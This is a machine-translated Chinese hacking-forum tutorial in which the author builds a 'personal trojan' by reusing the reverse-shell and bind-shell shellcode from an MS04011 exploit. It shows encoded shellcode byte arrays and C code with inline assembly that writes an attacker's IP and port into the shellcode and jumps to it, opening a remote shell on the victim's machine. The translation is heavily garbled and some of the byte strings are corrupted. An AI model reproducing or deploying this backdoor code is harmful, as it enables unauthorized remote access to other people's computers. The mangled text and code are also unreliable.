From MS04011 to Sunlion Personal Trojans V1.0 ********************************************************** **************** author: sunlion [EST] individual chalets: http: //evilsun.126.com * affiliated organizations: China evil octal http://www.eviloctal.com Http://www.eviloctal.com/forum********************** Reprint Please keep the author information *********** ************ A few days ago, I saw a person who wrote a rebounded line. I felt good, so I wanted to write one, but I truly wrote it. It was only discovered that this program is not as simple. In fact, I am a rookie, a vegetable vegetables, a rookie, I won't, huh, huh! I want to write such a wooden horse is really not easy. I just started to imagine, the program is divided into three parts, one to create a Winsock and our connection, the second part is to be responsible for calling the other computer The cmd.exe program, the third part, write a send.exe program, which is responsible for calling the first program to run the parameters after running the parameters and send it to us.
In fact, this is my idea, huh, I think I think, can this program have permission? Not at all, the permissions you get are not admin programs, so think about developing such a program, pressing my current level, it seems that it is not good! I am a rookie, but I have the courage and confidence that enhances my ability! Oh, talk about it, but it is still not so easy! Later, I thought of Winshell.exe's original code. I still remember it. This is a lonely swordsman's work. Oh, a quite exquisite little program, so I got a few pieces of WINSHELL code, basically Winshell's principle function, and inside used some means to cognition, huh, it is really not easy, I used a lot of functions, I have to check it, I checked N, huh, I have encountered the lesson I have to go. This cannot be seen in the dormitory, and finally take the print, rely on 22 pages, send it to me, huh! After reading the WINSHELL code, I found out that his principle is different, but the code is read, I still have a big great harvest, there is a good one on how to write Trojans into system services, etc. The code inside is really rich, very useful, haha! Finally, I remembered this overflow program. Everyone knows this overflower, as long as the other party has the vulnerability of the MS04011, then I use this program to use the NC listening to a port, such as the other party, then connect to the local, then we I got a shell of the other party. Oh, what are you waiting for, so I browsed the code inside the EST Forum, I finally found the code of MS04011 in the last few pages, haha! Because it is used to use N more functions, I check it, I was really tired, huh, huh, but I still finished it for my procedure, huh, huh! Write here, I will see it here, I don't want to take them myself. Because I will not put them all the posts, if you encounter a function inside, you can go to the EST forum has a C There is a post name inside the language version:
Below start analysis code: usage: expl
This main function team is not very important, because the code to be analyzed is very important to me, ... .. (middle program omit) The following programs come here: if (argc> 4) // Now determine the parameters of our input Number, if it is greater than 4, this is active connection or rebound! IF (! Memcmp (Argv [4], "-t", 2)) OPT = 1; // Start There is no -t in the parameters we entered, if there is so OPT == 1, then the state A port, if there is no -t, Opt == 0 (this is his initial value), then the rebound is coming back to our port, if ((argc> 4) &&! Opt) {// Program initialization OPT is 0, If OPT == 0, then! OPT is true! Port = HTONS (ATOI (ARGV [3])) ^ (Ushort) 0x9999; // Start getting the port IP = INET_ADDR (Argv [4]) ^ (ULONG) 0x99999999; // Here to get our input IpMemcpy (& REVERSESHELL [118], & port, 2); // Here is the SHELLCPY (& ReverseShell [111], & IP, 4) that starts copying the port to memory. // This is to start copying IP to memory. SC = REVERSESHELL in the shellcode code; // This is used to use our defined shellcole paying to SC! } else {// If OPT == 1, then there is -T, enter the bonded port type port = htons (ATOI (ATOI (ATOI (Argv [3])) ^ (usort) 0x9999; // Here starts to get our input Port Memcpy (& Bindshell [176], & port, 2); // Here is the SC = BINDSHELL in the shellcode code that starts to copy the port to the memory; // This uses the shellcode section of my defined bindshell. SC} Everyone sees the program here, basically knows that MS04011 uses binding ports or rebound to our computer, it is important to use the two shellcode defined above, one is UNSIGNED Char Reverseshell []. The other is unsigned char bindshell []; in fact, there are still many code, I will not analyze, because I don't use it for my writing trees; here, we can summarize it, MS04011 can bind port and rebound to our computer, It is related to shellcode, then what is shellcode, why shellcode can rebound to our computer and we get shellcode? In fact, this is hard to say clearly, because I don't even understand myself, huh, huh! I checked the information: shellcode is generally achieved by overflow, and to call the API of the target system when executed, therefore requiring shellcode to acquire a more general way to obtain the API function address of the target system. Secondly, due to its difficulty of its operating address, the addressing of the data should be used to use a dynamic method. In addition, shellcode is typically sent as a data to be attacked.
And MS04011 is in this form, send shellcode to the other party, and we want to use shellcode as a Trojan to let others practice, build a Winsock connection to our computer, then we can get permission, this is Why do we get the reason for Shell. Write shellcode has two ways to popularize: writing extraction with C language; write and extract with assembly language. The MS04011 is joined in the program, which is the two shellcode we said. To achieve our goal.
Of course, shellcode is not a one or two decisions. It is clear that as long as we execute a special shellcode, then we get permissions, if so, then we can regard shellcode as a subroutine in a compilation Come and stay! So far, we have made ideas, then how can I let the other party implement our shellcod? Everyone learned the compilation, I will know when I have to implement its subroutine in the assembly, (where PN is the label we define a subroutine, and this label is often the entrance of our subroutine, this is this The offset address of the subroutine in the memory of the CS code segment, so we must now let our Trojan execute this shellcode, of course we can't use Call in the VC, because it is the directive in the assembly, and There is no directive in the VC, so we have to embed the assembly code in the VC, you want to use __asm {}, to implement shellcode already loaded in memory, haha, sunlion [EST] This semester is just a class of assembly The Win32ASM has also been studied in the past few days, and it is finally used here! Ok, the principle is this! We have to write this Trojan now, and shellcode has appeared, it is REVERSESHELL [] and bindshell [] inside MS04011, as long as we implement this code, you can get permissions, but everyone wants MS04011 why port and What about connecting to our computer? In fact, these functions are included in Shellcode, which is what MS04011 To get the parameters such as IP and ports, and write the IP and port we extracted into the shellcode (for easy understanding, what is said)? Stupid, huh, huh, if we don't put the IP and ports, then I don't know if I have finished SHELLCODE, I have to write there, so we have to write the IP and port to the inside, huh, this computer will be used to implement shellcode, Create a Winsock connection to us to set the IP and port! In fact, this Trojan's main working principle has already come out, knowing the programmed friend seeing it is estimated that he has been writing his own procedure. Below I am in front of everyone, it is ugly :)! First, define header files: #include
/ x7b / x60 / xf1 / xaa / xab / x99 / x99 / xf1 / XEE / XEA / XAB / XC6 / XCD / X66 / X8F / X12 "" / x71 / xf3 / x9d / xc0 / x71 / x1b / x99 / x99 / x99 / x7b / x09 / x98 / x99 "" / x99 / xcd / xf1 / x98 / x98 / x99 / x99 / x66 / xcf / x89 / xc9 / xc9 / xc9 / xc9 / xd9 / xc9 "" / xd9 / xc9 / x66 / xcf / x8d / x12 / x41 / x99 / x98 / x99 / x9b / x99 / x9d "" / x4b / x12 / x55 / xf3 / x89 / xc8 / xca / X66 / XCF / X81 / X1C / X59 / XEC / XD3 / XF1 / XFA "" / XF4 / XFD / X99 / X10 / XFF / XA9 / X1A / X75 / XCD / X14 / XA5 / XBD / XF3 / X8C / XC0 / x32 "/ x7b / x64 / x5f / xdd / xbd / x89 / xdd / x67 / xdd / xbd / xd1 / x10" "" "" "/ xc5 / XBD / XD5 / X10 / XC5 / XBD / XC9 / X14 / XDD / XBD / X89 / XCD / XC9 / XC8 / XC8 / XC8 "" "" / XF3 / X98 / XC8 / XC8 / X66 / XEF / XA9 / XC8 / X66 / XCF / X9D / X12 / X55 / XF3 / x66 / x66 "" / xa8 / x66 / xcf / x91 / xca / x66 / xcf / x95 / xc8 / xcf / x12 / xdc / xa5 "" / x12 / xcd / xb1 / xe1 / x9a / X4C / XCB / X12 / XEB / XB9 / X9A / X6C / XAA / X50 / XD0 / XD8 "" / x34 / x9a / x5c / xaa / x42 / x96 / x27 / x89 / xa3 / x4f / xed / x91 / x58 / X52 / x94 / x9a "" / x43 / xd9 / x72 / x68 / xa2 / x86 / x-xc3 / xbd / x9a / x44 / xd2 / x12 "/ x95 / xd2 / x12 / xc3 / x85 / x9a / x44 / x12 / x9d / x12 / x9a / x5c / x32 / xc7 / xc0 / x5a "" / x71 / x99 / x66 / x66 / x66 / x17 / xd7 / x97 / x75 / xeb / x67 / x2a / x8f / x34 / x40 / x9c "" / x57 / x76 / x 57 / x79 / xf9 / x52 / x74 / x65 / xa2 / x40 / x90 / x6c / x34 / x75 / x60 / x33 "" / xf9 / x7e / x-x5 / x5f / xe0 "; // bind shellcode Here is our active connection Is the shellcode to be used, the offset of the inserted port is 176Unsigned char bindshell [] = "/ x1d / x5a / x4a / x33 / xc9 / x66 / xb9 / x7d / x01 / x80 / x34 / x0a / x99 / XE2 / XFA "/ XEB / X05 / XE8 / XEB / XFF / XFF / XFF" "/ x99 / x99 / xc3 / xfd / x38 / xa9 / x99 / x99 / x99 / x12 / xd9 / X95 / X12 "/ XE9 / X85 / X34 / X12 / XD9 / X91 / X12 / X41 / X12 / XEA / XA5 / X12 / XED / X87 / XE1 / X9A" "/ X6A / X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA / X74 / XCF / XCE / XC8 / X12 / XA6 "" / X9A / X62 / X12 / X6B / XF3 / X97 / XC0 / X6A / X3F / XED / X91 / XC0 / XC6 / X1A / X5E / X9D "" "
/ XDC / X7B / X70 / XC0 / XC6 / XC7 / X12 / X54 / X12 / XDF / XBD / X9A / X5A / X48 / X78 / X9A "" / x58 / xaa / x50 / xff / x12 / x91 / x12 / xdf / x85 / x9a / x5a / x58 / x58 "" / x12 / x99 / x9a / x5a / x12 / x63 / x12 / x6e / x1a / x5f / x97 / x12 / x49 / xf3 / x9a / xc0 "" / x71 / x1e / x1a / x99 / x94 / xcb / xcf / x66 / xce / x65 / xc3 / x12 / x41 "" / xf3 / x9c / xc0 / x71 / xed / x99 / x99 / x99 / xc9 / xc9 / xc9 / xc9 / xf3 / x98 / xf3 / x9b "" / x66 / xce / x75 / x12 / x41 / x5e / x9e / x9b / x99 / x9d / x4b / xaa / x59 / x10 / xde / x9d "" / xf3 / x89 / xca / xca / x66 / xca / x66 / xca / x6d / xc9 / xc9 / xca "" / x66 / xce / x61 / x12 / x49 / x1a / x75 / xdd / x12 / x6d / xaa / x59 / xf3 / x89 / xc0 / x10 "" / x9d / x17 / x7b / x62 / x10 / xcf / xa1 / x10 / xcf / xa5 / x10 / xcf / xd9 / XFF / x5e / xdf "/ xb5 / x98 / x98 / x14 / xde / x89 / xc9 / xcf / xaa / x50 / xc8 / xc8 / xc8 / xf3 / x98 / xc8" "/ XC8 / X5E / XDE / XA5 / XFA / XF4 / XFD / X99 / X14 / XDE / XA5 / XC9 / XC8 / X66 / XCE / X79 "" / XCB / X66 / XCE / X65 / XCA / X66 / XCE / X65 / XC9 / X66 / XCE / X7D / XAA / x59 / x35 / x1c "" / x59 / XEC / X60 / XC8 / XCB / XCF / XCA / X66 / X4B / XC3 / XC0 / X32 / X7B / X77 / XAA / X59 "" / x5a / x71 / x76 / x67 / x66 / x66 / xde / xfc / xed / xc9 / xeb / xf6 / xfa / xd8 / xfd / xfd "/ XEB / XFC / XEA / XEA / X99 / XDA / XEB / XFC / XF8 / XED / XFC / XC9 / XEB / XF6 / XFA / XFC "" / XEA / XEA / X D8 / X99 / XDC / XE1 / XF0 / XED / XCD / XF1 / XEB / XFC / XD5 "" / XF6 / XF8 / XFD / XD5 / XF0 / XFB / XEB / XF8 / XEB / XE0 / XD8 / X99 / XEE / XEA / XAB / XC6 "" / XAA / XAb / X99 / XCE / XCA / XD8 / XCA / XD6 / XD8 / X99 / XFB / XF0 "" "/ XF7 / XFD / X99 / XF5 / XF0 / XEA / XED / XFC / XF7 / X99 / XF8 / XFA / XFA / XFC / XE9 / XED "" / X99 / XFA / XF5 / XEA / XEA / XFC / XEA / XF6 / XFA / XF2 / XFC / XED / X99 "; then performs the writing of the function part: void main (int Argc, char * argv []) {unsigned short port; definition port // unsigned short stag; unsigned long ip; // Define ipwsadata WSA; WSASTARTUP (Makeword (2, 2), & WSA); // is responsible for the initial words of SOCK, in which 2.2 version if (argc == 2) // Decisive We are required to be active connection or rebound connection, if Argc ==
2, explain I have to actively connect {port = HTONS (ATOI (argv [1])) ^ (usort) 0x9999; // Depending on the port of the port I entered Extract Port Memcpy (& Bindshell [176], & port, 2); // It is copied to a place that is already loaded into the middle of the bindshell offset to 176 __asm // We want to call assembly {Lea Eax, bindshell // get bindshell's offset address in memory JMP EAX // use unconditional jump instructions The program jumps to the place of Bindshell, letting the system implement our well-constructed shellcode}} else if (argc == 3) / / This is what I want to rebound is {port = HTONS (ATOI (ARGV [1])) ^ (Ushort) 0x9999; // Extract port ip = inet_addr (argv [2]) ^ (ULONG) 0x99999999; // Extract IPMemcpy (& ReverseShell [118], & port, 2); // Copy the port to Shellcode memory offset Memcpy (& ReverShell [111], & IP, 4) in the unit of 118; // copy the IP to the memory cell of the offset to 111 __asm {lea eax ,rew, reverseShell // Get offset addresses, stored in EXA Jump eax // Let the program jump here, implement}} else printf ("Active connection usage: EvilSun
